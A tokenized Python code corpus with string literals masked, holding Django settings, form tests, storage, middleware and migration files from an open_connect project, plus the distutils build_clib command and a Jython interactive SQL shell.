<s> """<STR_LIT>""" <EOL> import environ <EOL> env = environ . Env ( <EOL> BRAND_TITLE = ( str , '<STR_LIT>' ) , <EOL> ORGANIZATION = ( str , '<STR_LIT>' ) , <EOL> HOSTNAME = ( str , '<STR_LIT>' ) , <EOL> ORIGIN = ( str , '<STR_LIT>' ) , <EOL> DEFAULT_FROM_ADDRESS = ( str , '<STR_LIT>' ) , <EOL> DEFAULT_FROM_EMAIL = ( str , '<STR_LIT>' ) , <EOL> SYSTEM_USER_NAME = ( str , '<STR_LIT>' ) , <EOL> SYSTEM_USER_EMAIL = ( str , '<STR_LIT>' ) , <EOL> GOOGLE_ANALYTICS_PROPERTY_ID = ( str , '<STR_LIT>' ) , <EOL> GOOGLE_ANALYTICS_DEBUG_MODE = ( bool , False ) , <EOL> ICON_PREFIX = ( str , "<STR_LIT>" ) <EOL> ) <EOL> BRAND_TITLE = env ( '<STR_LIT>' ) <EOL> ORGANIZATION = env ( '<STR_LIT>' ) <EOL> HOSTNAME = env ( '<STR_LIT>' ) <EOL> ORIGIN = env ( '<STR_LIT>' ) <EOL> DEFAULT_FROM_EMAIL = env ( '<STR_LIT>' ) <EOL> DEFAULT_FROM_ADDRESS = env ( '<STR_LIT>' ) <EOL> SYSTEM_USER_EMAIL = env ( '<STR_LIT>' ) <EOL> SYSTEM_USER_NAME = env ( '<STR_LIT>' ) <EOL> GA_PROPERTYID = env ( '<STR_LIT>' ) <EOL> GA_DEBUG_MODE = env ( '<STR_LIT>' ) <EOL> EMAIL_SECRET_KEY = env ( '<STR_LIT>' ) <EOL> ICON_PREFIX = env ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import timedelta , datetime <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . exceptions import ValidationError <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from django . utils . timezone import now <EOL> from mock import patch <EOL> from model_mommy import mommy <EOL> from open_connect . accounts import forms <EOL> from open_connect . accounts . models import Invite <EOL> from open_connect . connectmessages . models import Thread <EOL> from open_connect . connectmessages . tests import ConnectMessageTestCase <EOL> from open_connect . connect_core . tests . test_utils_mixins import TEST_HTML <EOL> User = get_user_model ( ) <EOL> class UserFormTest ( ConnectMessageTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ patch . object ( forms . SanitizeHTMLMixin , '<STR_LIT>' ) <EOL> def test_form_cleans_html ( self , mock ) : <EOL> """<STR_LIT>""" <EOL> form = forms . UserForm ( { '<STR_LIT>' : TEST_HTML } , instance = self . user1 ) <EOL> form . is_valid ( ) <EOL> mock . assert_called_once_with ( TEST_HTML ) <EOL> class UserAdminFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_init ( self ) : <EOL> """<STR_LIT>""" <EOL> class BanUserFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( BanUserFormTest , self ) . setUp ( ) <EOL> self . group1 = mommy . make ( '<STR_LIT>' ) <EOL> self . normal_user = mommy . make ( '<STR_LIT>' ) <EOL> self . normal_user . add_to_group ( self . group1 . pk ) <EOL> self . banned_user = mommy . make ( '<STR_LIT>' ) <EOL> self . banned_user . add_to_group ( self . group1 . pk ) <EOL> thread = mommy . make ( '<STR_LIT>' , group = self . group1 ) <EOL> self . message1 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . banned_user , thread = thread ) <EOL> self . message1 . created_at = now ( ) - timedelta ( hours = <NUM_LIT:3> ) <EOL> self . message1 . 
save ( ) <EOL> self . message2 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . normal_user , thread = thread ) <EOL> self . thread = Thread . objects . get ( pk = thread . pk ) <EOL> def test_save_first_message_sender_is_banned_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . thread . first_message , self . message1 ) <EOL> self . assertEqual ( self . thread . latest_message , self . message2 ) <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . latest_message , self . message2 ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> def test_save_latest_message_sender_is_banned_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . message1 . sender = self . normal_user <EOL> self . message1 . save ( ) <EOL> self . message2 . sender = self . normal_user <EOL> self . message2 . created_at = now ( ) + timedelta ( seconds = <NUM_LIT:10> ) <EOL> self . message2 . save ( ) <EOL> mommy . make ( <EOL> '<STR_LIT>' , <EOL> thread = self . thread , <EOL> sender = self . banned_user <EOL> ) <EOL> message4 = mommy . make ( <EOL> '<STR_LIT>' , <EOL> thread = self . thread , <EOL> sender = self . banned_user <EOL> ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . first_message , self . message1 ) <EOL> self . assertEqual ( thread . latest_message , message4 ) <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . 
banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> thread = Thread . objects . get ( pk = self . thread . pk ) <EOL> self . assertEqual ( thread . latest_message , self . message2 ) <EOL> def test_save_confirm_is_true_user_gets_banned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertTrue ( user . is_banned ) <EOL> def test_save_confirm_is_false_user_does_not_get_banned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertFalse ( user . is_banned ) <EOL> @ patch . object ( forms , '<STR_LIT>' ) <EOL> def test_save_confirm_is_false_threads_not_updated ( self , mock_thread ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . banned_user . is_banned ) <EOL> form = forms . BanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:0> ) <EOL> form = forms . BanUserForm ( <EOL> { <EOL> '<STR_LIT:user>' : self . banned_user . pk , <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . 
call_count , <NUM_LIT:1> ) <EOL> class UnBanUserFormTest ( ConnectMessageTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UnBanUserFormTest , self ) . setUp ( ) <EOL> self . banned_user = mommy . make ( '<STR_LIT>' , is_banned = True ) <EOL> self . banned_user . add_to_group ( self . group1 . pk ) <EOL> @ patch . object ( forms , '<STR_LIT>' ) <EOL> def test_save_confirm_is_false_thread_not_updated ( self , mock_thread ) : <EOL> """<STR_LIT>""" <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : False } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:0> ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> self . assertEqual ( mock_thread . objects . filter . call_count , <NUM_LIT:1> ) <EOL> def test_save_confirm_is_false_user_not_unbanned ( self ) : <EOL> """<STR_LIT>""" <EOL> self . banned_user . is_banned = True <EOL> self . banned_user . save ( ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> user = User . objects . get ( pk = self . banned_user . pk ) <EOL> self . assertFalse ( user . is_banned ) <EOL> def test_save_unbanned_user_sent_most_recent_message ( self ) : <EOL> """<STR_LIT>""" <EOL> thread = mommy . make ( '<STR_LIT>' , group = self . group1 ) <EOL> message1 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . normal_user , thread = thread ) <EOL> message2 = mommy . make ( <EOL> '<STR_LIT>' , sender = self . banned_user , thread = thread ) <EOL> message2 . created_at = now ( ) + timedelta ( seconds = <NUM_LIT:10> ) <EOL> message2 . save ( ) <EOL> thread = Thread . objects . get ( pk = thread . 
pk ) <EOL> self . assertEqual ( thread . latest_message , message1 ) <EOL> form = forms . UnBanUserForm ( <EOL> { '<STR_LIT:user>' : self . banned_user . pk , '<STR_LIT>' : True } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> form . save ( ) <EOL> thread = Thread . objects . get ( pk = thread . pk ) <EOL> self . assertEqual ( thread . latest_message , message2 ) <EOL> class InviteFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_clean_emails_one_email ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> self . assertEqual ( form . clean_emails ( ) , [ '<STR_LIT>' ] ) <EOL> def test_clean_emails_multiple_addresses ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> emails = form . clean_emails ( ) <EOL> self . assertItemsEqual ( <EOL> emails , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_clean_emails_no_valid_addresses ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ValidationError ) : <EOL> form = forms . InviteForm ( { '<STR_LIT>' : '<STR_LIT:test>' } ) <EOL> self . assertFalse ( form . is_valid ( ) ) <EOL> form . clean_emails ( ) <EOL> @ override_settings ( CELERY_ALWAYS_EAGER = False ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteForm ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> form . created_by = mommy . make ( '<STR_LIT>' , is_superuser = True ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> result = form . save ( ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:3> ) <EOL> first_result = Invite . objects . get ( pk = result [ <NUM_LIT:0> ] . pk ) <EOL> self . assertIsNone ( first_result . 
notified ) <EOL> class InviteEntryFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_clean_invite_code ( self ) : <EOL> """<STR_LIT>""" <EOL> invite = mommy . make ( '<STR_LIT>' ) <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : invite . code } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> self . assertEqual ( form . cleaned_data [ '<STR_LIT>' ] , invite ) <EOL> def test_clean_invite_code_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( form . is_valid ( ) ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> invite = mommy . make ( '<STR_LIT>' ) <EOL> self . assertFalse ( invite . consumed_at ) <EOL> self . assertFalse ( invite . consumed_by ) <EOL> form = forms . InviteEntryForm ( { '<STR_LIT>' : invite . code } ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> user = mommy . make ( '<STR_LIT>' ) <EOL> form . user_id = user . pk <EOL> form . save ( ) <EOL> invite = Invite . objects . get ( pk = invite . pk ) <EOL> self . assertTrue ( invite . consumed_at ) <EOL> self . assertEqual ( invite . consumed_by , user ) <EOL> class TermsAndConductAcceptFormTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_valid ( self ) : <EOL> """<STR_LIT>""" <EOL> form = forms . TermsAndConductAcceptForm ( <EOL> { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT:/>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> def test_save ( self ) : <EOL> """<STR_LIT>""" <EOL> user = mommy . make ( '<STR_LIT>' ) <EOL> form = forms . TermsAndConductAcceptForm ( <EOL> { '<STR_LIT>' : '<STR_LIT:yes>' , '<STR_LIT>' : '<STR_LIT:yes>' , '<STR_LIT>' : '<STR_LIT:/>' } <EOL> ) <EOL> self . assertTrue ( form . is_valid ( ) ) <EOL> user = form . save ( user . pk ) <EOL> self . assertIsInstance ( user . tos_accepted_at , datetime ) <EOL> self . assertIsInstance ( user . ucoc_accepted_at , datetime ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from uuid import uuid4 <EOL> from django . conf import settings <EOL> from django . core . files . storage import get_storage_class <EOL> AttachmentStorageEngine = get_storage_class ( <EOL> import_path = getattr ( <EOL> settings , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ) <EOL> def uniqify_filename ( filename ) : <EOL> """<STR_LIT>""" <EOL> filelist = filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> filelist [ <NUM_LIT:0> ] = uuid4 ( ) . hex <EOL> return '<STR_LIT:.>' . join ( filelist ) <EOL> def setting ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( settings , name , default ) <EOL> class HighValueStorage ( AttachmentStorageEngine ) : <EOL> """<STR_LIT>""" <EOL> default_acl = '<STR_LIT>' <EOL> secure_urls = True <EOL> custom_domain = None <EOL> querystring_expire = <NUM_LIT> <EOL> querystring_auth = True <EOL> class AttachmentStorage ( HighValueStorage ) : <EOL> """<STR_LIT>""" <EOL> def get_available_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> filename_format = '<STR_LIT>' <EOL> try : <EOL> clean_name = self . _clean_name ( name ) <EOL> except AttributeError : <EOL> clean_name = name <EOL> date = datetime . now ( ) . strftime ( '<STR_LIT>' ) <EOL> splitname = clean_name . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> final_name = filename_format . format ( <EOL> path = splitname [ <NUM_LIT:0> ] , <EOL> date = date , <EOL> filename = uniqify_filename ( splitname [ <NUM_LIT:1> ] ) <EOL> ) <EOL> return final_name </s>
<s> """<STR_LIT>""" <EOL> from django . contrib import admin <EOL> from open_connect . groups . models import Category <EOL> class CategoryAdmin ( admin . ModelAdmin ) : <EOL> """<STR_LIT>""" <EOL> readonly_fields = [ <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> admin . site . register ( Category , CategoryAdmin ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect <EOL> EXEMPT_URLS = [ re . compile ( settings . LOGIN_URL . lstrip ( '<STR_LIT:/>' ) ) ] <EOL> if hasattr ( settings , '<STR_LIT>' ) : <EOL> EXEMPT_URLS += [ <EOL> re . compile ( exempt_url ) for exempt_url in settings . LOGIN_EXEMPT_URLS ] <EOL> class InviteMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . is_authenticated ( ) and not request . user . invite_verified : <EOL> path = request . path_info . lstrip ( '<STR_LIT:/>' ) <EOL> if not any ( m . match ( path ) for m in EXEMPT_URLS ) : <EOL> redirect_to = '<STR_LIT>' % ( <EOL> reverse ( '<STR_LIT>' ) , request . path_info ) <EOL> return HttpResponseRedirect ( redirect_to ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False , db_index = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT:30> , db_index = True , choices = [ ( b'<STR_LIT:none>' , b"<STR_LIT>" ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import os , string <EOL> from types import * <EOL> from distutils . core import Command <EOL> from distutils . errors import * <EOL> from distutils . sysconfig import customize_compiler <EOL> from distutils import log <EOL> def show_compilers ( ) : <EOL> from distutils . ccompiler import show_compilers <EOL> show_compilers ( ) <EOL> class build_clib ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:t>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:g>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' , <EOL> "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' , <EOL> "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> help_options = [ <EOL> ( '<STR_LIT>' , None , <EOL> "<STR_LIT>" , show_compilers ) , <EOL> ] <EOL> def initialize_options ( self ) : <EOL> self . build_clib = None <EOL> self . build_temp = None <EOL> self . libraries = None <EOL> self . include_dirs = None <EOL> self . define = None <EOL> self . undef = None <EOL> self . debug = None <EOL> self . force = <NUM_LIT:0> <EOL> self . compiler = None <EOL> def finalize_options ( self ) : <EOL> self . set_undefined_options ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . libraries = self . distribution . libraries <EOL> if self . libraries : <EOL> self . check_library_list ( self . libraries ) <EOL> if self . include_dirs is None : <EOL> self . include_dirs = self . distribution . include_dirs or [ ] <EOL> if type ( self . include_dirs ) is StringType : <EOL> self . include_dirs = string . split ( self . include_dirs , <EOL> os . pathsep ) <EOL> def run ( self ) : <EOL> if not self . 
libraries : <EOL> return <EOL> from distutils . ccompiler import new_compiler <EOL> self . compiler = new_compiler ( compiler = self . compiler , <EOL> dry_run = self . dry_run , <EOL> force = self . force ) <EOL> customize_compiler ( self . compiler ) <EOL> if self . include_dirs is not None : <EOL> self . compiler . set_include_dirs ( self . include_dirs ) <EOL> if self . define is not None : <EOL> for ( name , value ) in self . define : <EOL> self . compiler . define_macro ( name , value ) <EOL> if self . undef is not None : <EOL> for macro in self . undef : <EOL> self . compiler . undefine_macro ( macro ) <EOL> self . build_libraries ( self . libraries ) <EOL> def check_library_list ( self , libraries ) : <EOL> """<STR_LIT>""" <EOL> if type ( libraries ) is not ListType : <EOL> raise DistutilsSetupError , "<STR_LIT>" <EOL> for lib in libraries : <EOL> if type ( lib ) is not TupleType and len ( lib ) != <NUM_LIT:2> : <EOL> raise DistutilsSetupError , "<STR_LIT>" <EOL> if type ( lib [ <NUM_LIT:0> ] ) is not StringType : <EOL> raise DistutilsSetupError , "<STR_LIT>" + "<STR_LIT>" <EOL> if '<STR_LIT:/>' in lib [ <NUM_LIT:0> ] or ( os . sep != '<STR_LIT:/>' and os . sep in lib [ <NUM_LIT:0> ] ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % lib [ <NUM_LIT:0> ] <EOL> if type ( lib [ <NUM_LIT:1> ] ) is not DictionaryType : <EOL> raise DistutilsSetupError , "<STR_LIT>" + "<STR_LIT>" <EOL> def get_library_names ( self ) : <EOL> if not self . libraries : <EOL> return None <EOL> lib_names = [ ] <EOL> for ( lib_name , build_info ) in self . libraries : <EOL> lib_names . append ( lib_name ) <EOL> return lib_names <EOL> def get_source_files ( self ) : <EOL> self . check_library_list ( self . libraries ) <EOL> filenames = [ ] <EOL> for ( lib_name , build_info ) in self . libraries : <EOL> sources = build_info . 
get ( '<STR_LIT>' ) <EOL> if ( sources is None or <EOL> type ( sources ) not in ( ListType , TupleType ) ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % lib_name <EOL> filenames . extend ( sources ) <EOL> return filenames <EOL> def build_libraries ( self , libraries ) : <EOL> for ( lib_name , build_info ) in libraries : <EOL> sources = build_info . get ( '<STR_LIT>' ) <EOL> if sources is None or type ( sources ) not in ( ListType , TupleType ) : <EOL> raise DistutilsSetupError , ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) % lib_name <EOL> sources = list ( sources ) <EOL> log . info ( "<STR_LIT>" , lib_name ) <EOL> macros = build_info . get ( '<STR_LIT>' ) <EOL> include_dirs = build_info . get ( '<STR_LIT>' ) <EOL> objects = self . compiler . compile ( sources , <EOL> output_dir = self . build_temp , <EOL> macros = macros , <EOL> include_dirs = include_dirs , <EOL> debug = self . debug ) <EOL> self . compiler . create_static_lib ( objects , lib_name , <EOL> output_dir = self . build_clib , <EOL> debug = self . debug ) </s>
<s> import dbexts , cmd , sys , os <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> import java . lang . String <EOL> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> class IsqlExit ( Exception ) : pass <EOL> class Prompt : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , isql ) : <EOL> self . isql = isql <EOL> def __str__ ( self ) : <EOL> prompt = "<STR_LIT>" % ( self . isql . db . dbname ) <EOL> if len ( self . isql . sqlbuffer ) > <NUM_LIT:0> : <EOL> prompt = "<STR_LIT>" <EOL> return prompt <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> def __tojava__ ( self , cls ) : <EOL> if cls == java . lang . String : <EOL> return self . __str__ ( ) <EOL> return False <EOL> class IsqlCmd ( cmd . Cmd ) : <EOL> def __init__ ( self , db = None , delimiter = "<STR_LIT:;>" , comment = ( '<STR_LIT:#>' , '<STR_LIT>' ) ) : <EOL> cmd . Cmd . __init__ ( self , completekey = None ) <EOL> if db is None or type ( db ) == type ( "<STR_LIT>" ) : <EOL> self . db = dbexts . dbexts ( db ) <EOL> else : <EOL> self . db = db <EOL> self . kw = { } <EOL> self . sqlbuffer = [ ] <EOL> self . comment = comment <EOL> self . delimiter = delimiter <EOL> self . prompt = Prompt ( self ) <EOL> def parseline ( self , line ) : <EOL> command , arg , line = cmd . Cmd . parseline ( self , line ) <EOL> if command and command < > "<STR_LIT>" : <EOL> command = command . lower ( ) <EOL> return command , arg , line <EOL> def do_which ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> print self . db <EOL> return False <EOL> def do_EOF ( self , arg ) : <EOL> return False <EOL> def do_p ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> exec arg . strip ( ) in globals ( ) <EOL> except : <EOL> print sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> return False <EOL> def do_column ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def do_use ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> self . db = self . db . __class__ ( arg . 
strip ( ) ) <EOL> return False <EOL> def do_table ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) : <EOL> self . db . table ( arg , ** self . kw ) <EOL> else : <EOL> self . db . table ( None , ** self . kw ) <EOL> return False <EOL> def do_proc ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) : <EOL> self . db . proc ( arg , ** self . kw ) <EOL> else : <EOL> self . db . proc ( None , ** self . kw ) <EOL> return False <EOL> def do_schema ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> print <EOL> self . db . schema ( arg ) <EOL> print <EOL> return False <EOL> def do_delimiter ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> delimiter = arg . strip ( ) <EOL> if len ( delimiter ) > <NUM_LIT:0> : <EOL> self . delimiter = delimiter <EOL> def do_o ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if not arg : <EOL> fp = self . db . out <EOL> try : <EOL> if fp : <EOL> fp . close ( ) <EOL> finally : <EOL> self . db . out = None <EOL> else : <EOL> fp = open ( arg , "<STR_LIT:w>" ) <EOL> self . db . out = fp <EOL> def do_q ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if self . db . out : <EOL> self . db . out . close ( ) <EOL> finally : <EOL> return True <EOL> def do_set ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> if len ( arg . strip ( ) ) == <NUM_LIT:0> : <EOL> items = self . kw . items ( ) <EOL> if len ( items ) : <EOL> print <EOL> for a in dbexts . console ( items , ( "<STR_LIT:key>" , "<STR_LIT:value>" ) ) [ : - <NUM_LIT:1> ] : <EOL> print a <EOL> print <EOL> return False <EOL> d = filter ( lambda x : len ( x ) > <NUM_LIT:0> , map ( lambda x : x . strip ( ) , arg . split ( "<STR_LIT:=>" ) ) ) <EOL> if len ( d ) == <NUM_LIT:1> : <EOL> if self . kw . has_key ( d [ <NUM_LIT:0> ] ) : <EOL> del self . kw [ d [ <NUM_LIT:0> ] ] <EOL> else : <EOL> self . kw [ d [ <NUM_LIT:0> ] ] = eval ( d [ <NUM_LIT:1> ] ) <EOL> def do_i ( self , arg ) : <EOL> fp = open ( arg ) <EOL> try : <EOL> print <EOL> for line in fp . 
readlines ( ) : <EOL> line = self . precmd ( line ) <EOL> stop = self . onecmd ( line ) <EOL> stop = self . postcmd ( stop , line ) <EOL> finally : <EOL> fp . close ( ) <EOL> return False <EOL> def default ( self , arg ) : <EOL> try : <EOL> token = arg . strip ( ) <EOL> if not token : <EOL> return False <EOL> comment = [ token . startswith ( x ) for x in self . comment ] <EOL> if reduce ( lambda x , y : x or y , comment ) : <EOL> return False <EOL> if token [ <NUM_LIT:0> ] == '<STR_LIT:\\>' : <EOL> token = token [ <NUM_LIT:1> : ] <EOL> if len ( token ) >= len ( self . delimiter ) : <EOL> if token [ - <NUM_LIT:1> * len ( self . delimiter ) : ] == self . delimiter : <EOL> self . sqlbuffer . append ( token [ : - <NUM_LIT:1> * len ( self . delimiter ) ] ) <EOL> if self . sqlbuffer : <EOL> q = "<STR_LIT:U+0020>" . join ( self . sqlbuffer ) <EOL> print q <EOL> self . db . isql ( q , ** self . kw ) <EOL> self . sqlbuffer = [ ] <EOL> if self . db . updatecount : <EOL> print <EOL> if self . db . updatecount == <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" % ( self . db . updatecount ) <EOL> print <EOL> return False <EOL> if token : <EOL> self . sqlbuffer . append ( token ) <EOL> except : <EOL> self . sqlbuffer = [ ] <EOL> print <EOL> print sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> print <EOL> return False <EOL> def emptyline ( self ) : <EOL> return False <EOL> def postloop ( self ) : <EOL> raise IsqlExit ( ) <EOL> def cmdloop ( self , intro = None ) : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cmd . Cmd . cmdloop ( self , intro ) <EOL> except IsqlExit , e : <EOL> break <EOL> except Exception , e : <EOL> print <EOL> print e <EOL> print <EOL> intro = None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import getopt <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , [ ] ) <EOL> except getopt . error , msg : <EOL> print <EOL> print msg <EOL> print "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] ) <EOL> sys . 
exit ( <NUM_LIT:0> ) <EOL> dbname = None <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> dbname = arg <EOL> intro = "<STR_LIT>" % ( __version__ ) <EOL> isql = IsqlCmd ( dbname ) <EOL> isql . cmdloop ( ) </s>
